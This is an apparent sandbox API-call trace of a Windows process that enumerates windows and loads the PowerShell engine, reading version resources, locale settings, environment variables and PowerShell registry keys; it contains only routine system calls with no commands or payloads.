	[0693.851] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc1c
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc08
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xabc
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x24c
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbb0
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbfc
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb10
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x374
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x368
	[0693.852] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb28
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xae8
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb14
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x95c
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa8c
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x46c
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb3c
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa90
	[0693.853] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xad0
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa9c
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xaa0
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb1c
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7e0
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa74
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x694
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa28
	[0693.854] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x9b0
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x8d8
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x940
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x93c
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4ec
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x150
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x720
	[0693.855] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x3c4
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7d4
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6c8
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb54
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb54
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6bc
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb5c
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x838
	[0693.856] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x818
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x5b8
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x494
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1ec
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x440
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7e8
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x730
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x2c8
	[0693.857] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x31c
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x330
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x128
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x5c8
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6f8
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x358
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x73c
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb0
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x250
	[0693.858] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x240
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x790
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x61c
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x568
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x538
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x540
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x79c
	[0693.859] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4e0
	[0693.860] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.978] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x778
	[0693.982] WerSetFlags () returned 0x0
	[0700.197] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0700.197] CoTaskMemFree (pv=0x0) 
	[0700.198] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce048, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce040 | out: pulNumLanguages=0x1ce048, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce040) returned 1
	[0700.198] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce048, pwszLanguagesBuffer=0x2cf7098, pcchLanguagesBuffer=0x1ce040 | out: pulNumLanguages=0x1ce048, pwszLanguagesBuffer=0x2cf7098, pcchLanguagesBuffer=0x1ce040) returned 1
	[0700.204] CoTaskMemAlloc (cb=0x24) returned 0x2c1d40
	[0700.204] GetUserDefaultLocaleName (in: lpLocaleName=0x2c1d40, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0700.204] CoTaskMemFree (pv=0x2c1d40) 
	[0702.539] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0702.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.539] CoTaskMemFree (pv=0x216720) 
	[0702.541] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0702.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.541] CoTaskMemFree (pv=0x216720) 
	[0702.544] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0702.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0702.544] CoTaskMemFree (pv=0x216720) 
	[0702.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0702.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0702.559] SetErrorMode (uMode=0x1) returned 0x1
	[0702.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdcc0 | out: lpFileInformation=0x1cdcc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0702.560] SetErrorMode (uMode=0x1) returned 0x1
	[0702.560] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdf30 | out: lpdwHandle=0x1cdf30) returned 0x94c
	[0702.561] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cfa928 | out: lpData=0x2cfa928) returned 1
	[0702.562] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdea8, puLen=0x1cdea0 | out: lplpBuffer=0x1cdea8*=0x2cfa9c4, puLen=0x1cdea0) returned 1
	[0702.562] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfaaa0, puLen=0x1cde10) returned 1
	[0702.562] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0702.562] CoTaskMemAlloc (cb=0x2e) returned 0x28da60
	[0702.562] lstrcpyW (in: lpString1=0x28da60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0702.562] CoTaskMemFree (pv=0x28da60) 
	[0702.562] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfaaf4, puLen=0x1cde10) returned 1
	[0702.562] lstrlenW (lpString="System.Management.Automation") returned 28
	[0702.562] CoTaskMemAlloc (cb=0x3c) returned 0x2ca260
	[0702.562] lstrcpyW (in: lpString1=0x2ca260, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0702.562] CoTaskMemFree (pv=0x2ca260) 
	[0702.562] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfab50, puLen=0x1cde10) returned 1
	[0702.562] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0702.562] CoTaskMemAlloc (cb=0x20) returned 0x2c7a80
	[0702.563] lstrcpyW (in: lpString1=0x2c7a80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0702.563] CoTaskMemFree (pv=0x2c7a80) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfab90, puLen=0x1cde10) returned 1
	[0702.563] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0702.563] CoTaskMemAlloc (cb=0x44) returned 0x2ca260
	[0702.563] lstrcpyW (in: lpString1=0x2ca260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0702.563] CoTaskMemFree (pv=0x2ca260) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfabf8, puLen=0x1cde10) returned 1
	[0702.563] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0702.563] CoTaskMemAlloc (cb=0x76) returned 0x25e4a0
	[0702.563] lstrcpyW (in: lpString1=0x25e4a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0702.563] CoTaskMemFree (pv=0x25e4a0) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfac94, puLen=0x1cde10) returned 1
	[0702.563] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0702.563] CoTaskMemAlloc (cb=0x44) returned 0x2ca260
	[0702.563] lstrcpyW (in: lpString1=0x2ca260, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0702.563] CoTaskMemFree (pv=0x2ca260) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfacf8, puLen=0x1cde10) returned 1
	[0702.563] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0702.563] CoTaskMemAlloc (cb=0x58) returned 0x246dc0
	[0702.563] lstrcpyW (in: lpString1=0x246dc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0702.563] CoTaskMemFree (pv=0x246dc0) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfad74, puLen=0x1cde10) returned 1
	[0702.563] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0702.563] CoTaskMemAlloc (cb=0x20) returned 0x2c7a80
	[0702.563] lstrcpyW (in: lpString1=0x2c7a80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0702.563] CoTaskMemFree (pv=0x2c7a80) 
	[0702.563] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x2cfaa1c, puLen=0x1cde10) returned 1
	[0702.564] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0702.564] CoTaskMemAlloc (cb=0x66) returned 0x23c610
	[0702.564] lstrcpyW (in: lpString1=0x23c610, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0702.564] CoTaskMemFree (pv=0x23c610) 
	[0702.564] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x0, puLen=0x1cde10) returned 0
	[0702.564] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x0, puLen=0x1cde10) returned 0
	[0702.564] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cde18, puLen=0x1cde10 | out: lplpBuffer=0x1cde18*=0x0, puLen=0x1cde10) returned 0
	[0702.564] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdde8, puLen=0x1cdde0 | out: lplpBuffer=0x1cdde8*=0x2cfa9c4, puLen=0x1cdde0) returned 1
	[0702.564] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0702.564] VerLanguageNameW (in: wLang=0x0, szLang=0x269740, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0702.564] CoTaskMemFree (pv=0x269740) 
	[0702.564] VerQueryValueW (in: pBlock=0x2cfa928, lpSubBlock="\\", lplpBuffer=0x1cde38, puLen=0x1cde30 | out: lplpBuffer=0x1cde38*=0x2cfa950, puLen=0x1cde30) returned 1
	[0704.376] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0704.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.376] CoTaskMemFree (pv=0x216720) 
	[0704.381] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0704.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0704.381] CoTaskMemFree (pv=0x216720) 
	[0704.386] lstrlenW (lpString="䅁") returned 1
	[0706.148] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd08 | out: phkResult=0x1cdd08*=0x304) returned 0x0
	[0706.150] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdcf8 | out: phkResult=0x1cdcf8*=0x308) returned 0x0
	[0706.150] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd88 | out: phkResult=0x1cdd88*=0x30c) returned 0x0
	[0706.155] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdccc, lpData=0x0, lpcbData=0x1cdcc8*=0x0 | out: lpType=0x1cdccc*=0x1, lpData=0x0, lpcbData=0x1cdcc8*=0x56) returned 0x0
	[0706.156] CoTaskMemAlloc (cb=0x5a) returned 0x2c6cb0
	[0706.156] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdc9c, lpData=0x2c6cb0, lpcbData=0x1cdc98*=0x56 | out: lpType=0x1cdc9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdc98*=0x56) returned 0x0
	[0706.156] CoTaskMemFree (pv=0x2c6cb0) 
	[0706.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0706.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0706.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0709.034] CoTaskMemAlloc (cb=0x104) returned 0x216720
	[0709.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x216720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0709.035] CoTaskMemFree (pv=0x216720) 
	[0720.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0720.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0723.769] CoTaskMemAlloc (cb=0x104) returned 0x213150
	[0723.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.770] CoTaskMemFree (pv=0x213150) 
	[0723.771] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
	[0723.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.772] CoTaskMemFree (pv=0x2d4c00) 
	[0723.804] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
	[0723.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.804] CoTaskMemFree (pv=0x2d4c00) 
	[0723.806] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
	[0723.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.806] CoTaskMemFree (pv=0x2d4c00) 
	[0723.806] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
	[0723.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.806] CoTaskMemFree (pv=0x2d4c00) 
	[0728.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0728.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0730.854] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
